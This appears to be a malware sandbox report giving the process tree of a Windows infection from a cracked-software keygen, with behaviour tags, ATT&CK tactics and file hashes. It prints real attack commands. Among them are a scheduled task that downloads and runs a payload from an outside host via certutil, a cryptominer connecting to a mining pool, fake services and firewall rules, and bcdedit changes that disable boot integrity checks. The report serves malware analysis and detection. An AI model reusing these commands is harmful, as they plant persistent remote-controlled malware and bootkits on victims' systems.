C:\Users\Admin\AppData\Roaming\1613213258946.exe"C:\Users\Admin\AppData\Roaming\1613213258946.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213258946.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1613213263452.exe"C:\Users\Admin\AppData\Roaming\1613213263452.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213263452.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1613213268702.exe"C:\Users\Admin\AppData\Roaming\1613213268702.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213268702.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-45A1N.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-45A1N.tmp\23E04C4F32EF2158.tmp" /SL5="$D01D8,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 27365⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\9357.tmp.exe"C:\Users\Admin\AppData\Roaming\9357.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\9357.tmp.exe"C:\Users\Admin\AppData\Roaming\9357.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe"5⤵
- Executes dropped EXE
-
C:\ProgramData\5760565.63"C:\ProgramData\5760565.63"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 7247⤵
- Program crash
-
C:\ProgramData\5260076.57"C:\ProgramData\5260076.57"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\1405378.15"C:\ProgramData\1405378.15"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gdrrr.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0A7CD0FE63FAB377E31BEA09DEB29C64 C2⤵
- Loads dropped DLL
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\8B59.exeC:\Users\Admin\AppData\Local\Temp\8B59.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b10be062-653e-4280-8633-30e2d7899dec" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\8B59.exe"C:\Users\Admin\AppData\Local\Temp\8B59.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin1.exe"C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin2.exe"C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin.exe"C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\5.exe"C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\4dda1698-61e8-44a9-aa65-b332916d6d96\5.exe & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8D7C.exeC:\Users\Admin\AppData\Local\Temp\8D7C.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8D7C.exe /f & erase C:\Users\Admin\AppData\Local\Temp\8D7C.exe & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8D7C.exe /f3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\93E6.exeC:\Users\Admin\AppData\Local\Temp\93E6.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\93E6.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Users\Admin\AppData\Local\Temp\9D3E.exeC:\Users\Admin\AppData\Local\Temp\9D3E.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\A175.exeC:\Users\Admin\AppData\Local\Temp\A175.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bjghgnmw\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\aabmhigo.exe" C:\Windows\SysWOW64\bjghgnmw\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bjghgnmw binPath= "C:\Windows\SysWOW64\bjghgnmw\aabmhigo.exe /d\"C:\Users\Admin\AppData\Local\Temp\A175.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bjghgnmw "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bjghgnmw2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\A89A.exeC:\Users\Admin\AppData\Local\Temp\A89A.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\B443.exeC:\Users\Admin\AppData\Local\Temp\B443.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 17362⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\BCD0.exeC:\Users\Admin\AppData\Local\Temp\BCD0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BCD0.exeC:\Users\Admin\AppData\Local\Temp\BCD0.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\bjghgnmw\aabmhigo.exeC:\Windows\SysWOW64\bjghgnmw\aabmhigo.exe /d"C:\Users\Admin\AppData\Local\Temp\A175.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵
-
C:\Users\Admin\AppData\Local\Temp\C695.exeC:\Users\Admin\AppData\Local\Temp\C695.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DF4E.exeC:\Users\Admin\AppData\Local\Temp\DF4E.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DF4E.exe"C:\Users\Admin\AppData\Local\Temp\DF4E.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E308.exeC:\Users\Admin\AppData\Local\Temp\E308.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E308.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\4695.tmp.exeC:\Users\Admin\AppData\Local\Temp\4695.tmp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4733.exeC:\Users\Admin\AppData\Local\Temp\4733.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4733.exeC:\Users\Admin\AppData\Local\Temp\4733.exe2⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\AppData\Local\Temp\4763.tmp.exeC:\Users\Admin\AppData\Local\Temp\4763.tmp.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\5108.tmp.exeC:\Users\Admin\AppData\Local\Temp\5108.tmp.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\51B5.exeC:\Users\Admin\AppData\Local\Temp\51B5.exe1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
New Service
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Bootkit
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2Modify Registry
6Virtualization/Sandbox Evasion
1Impair Defenses
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exeMD5
5105f53f9cd61fb0845decff0d1b785b
SHA11af3947555a2b955e3adac4b2f07ed14522e7d84
SHA256b8943fc714223b6c3802bbcf298374fa2558977122129d14efcad50a44d97ced
SHA5125df386a04be7206e55d46321c1016da595ff7cd4af18c41295c3700499bdf0204671bb4b5faf393af3cb7a7b47fa631b508ff801df58b852c04c452f9d1146e8
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exeMD5
5105f53f9cd61fb0845decff0d1b785b
SHA11af3947555a2b955e3adac4b2f07ed14522e7d84
SHA256b8943fc714223b6c3802bbcf298374fa2558977122129d14efcad50a44d97ced
SHA5125df386a04be7206e55d46321c1016da595ff7cd4af18c41295c3700499bdf0204671bb4b5faf393af3cb7a7b47fa631b508ff801df58b852c04c452f9d1146e8
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exeMD5
d221e60151a0f4af38d7632a08645ee5
SHA12cb5e473289cd4e86a2c3b93bf4bc9b23c800fd1
SHA25657ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97
SHA5120833936b772400921d1c39b40b84fb6b789ba7a799236114f8a82bf957e7607818fa87aae7847e284c3c9576174c0fa3ccc7a5130c995dd4bd7d2adf4c2562b1
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exeMD5
d221e60151a0f4af38d7632a08645ee5
SHA12cb5e473289cd4e86a2c3b93bf4bc9b23c800fd1
SHA25657ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97
SHA5120833936b772400921d1c39b40b84fb6b789ba7a799236114f8a82bf957e7607818fa87aae7847e284c3c9576174c0fa3ccc7a5130c995dd4bd7d2adf4c2562b1
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeMD5
5aad783cbda7ad27a2ddd665959daefb
SHA105a0f583f7293a5db7996bf4b3f6c3539d3b457f
SHA2563c1f7af5e69a599268bcb3343b8609006a255090234d699c77922c95743e9e98
SHA512dc1c3b8ebf6bbc7ef62c5d72b38342f1a4c832565905b62cc2d24bb7565e1069d8e49de0475b33cc1d327ec13816ee9e0945ab7ee76268ae08bc8e183435ce8c
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeMD5
edeb50f0b803732a581ab558bf87d968
SHA135858ce564d4c8b080bae606bf67292f5b9b2201
SHA256ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6
SHA5128c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeMD5
edeb50f0b803732a581ab558bf87d968
SHA135858ce564d4c8b080bae606bf67292f5b9b2201
SHA256ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6
SHA5128c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeMD5
edeb50f0b803732a581ab558bf87d968
SHA135858ce564d4c8b080bae606bf67292f5b9b2201
SHA256ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6
SHA5128c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273
-
C:\Users\Admin\AppData\Local\Temp\8B59.exeMD5
7efdbcd2dda98974f89290ce0a02cdc7
SHA1cbae61ac09fe75b570bee392aa70310ef4d94362
SHA256eb8de87523800e3aa747857a06938f3af3856fbd42be025688e2ff50248ac197
SHA512b9d334d10bc4c02007efcdd789a4fb91bffa3790c8d8357f438cd167c86097acc0b6d4889c1b81de77c42e8b7d5f04f3a8dffca80adc2a9148051b68d1215adc
-
C:\Users\Admin\AppData\Local\Temp\MSI5CEB.tmpMD5
84878b1a26f8544bda4e069320ad8e7d
SHA151c6ee244f5f2fa35b563bffb91e37da848a759c
SHA256809aab5eace34dfbfb2b3d45462d42b34fcb95b415201d0d625414b56e437444
SHA5124742b84826961f590e0a2d6cc85a60b59ca4d300c58be5d0c33eb2315cefaf5627ae5ed908233ad51e188ce53ca861cf5cf8c1aa2620dc2667f83f98e627b549
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exeMD5
65b49b106ec0f6cf61e7dc04c0a7eb74
